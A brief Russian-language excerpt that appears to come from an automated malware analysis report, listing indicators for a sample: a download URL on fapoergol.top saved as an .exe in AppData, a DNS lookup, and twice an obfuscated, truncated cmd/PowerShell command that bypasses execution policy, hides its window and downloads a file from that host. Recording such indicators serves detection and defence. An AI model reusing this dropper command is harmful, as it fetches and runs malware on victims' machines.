Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WErsH^E^l^l.eXe^ ^-EXecUtI^ONPoliCy^ ^byPa^SS ^-nO^Profi^L^E^ -wIN^DOws^T^yLE hi^D^D^en^ ^(^neW-^ob^je^c^t S^ysT^e^M.^ne^T^.^we^B^c^l^IenT^)^.DOwNLOa^dfi^L^E(^'http://www.fapoe...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "p^o^WErsH^E^l^l.eXe^ ^-EXecUtI^ONPoliCy^ ^byPa^SS ^-nO^Profi^L^E^ -wIN^DOws^T^yLE hi^D^D^en^ ^(^neW-^ob^je^c^t S^ysT^e^M.^ne^T^.^we^B^c^l^IenT^)^.DOwNLOa^dfi^L^E(^'http://www.fapoe...' (со скрытым окном)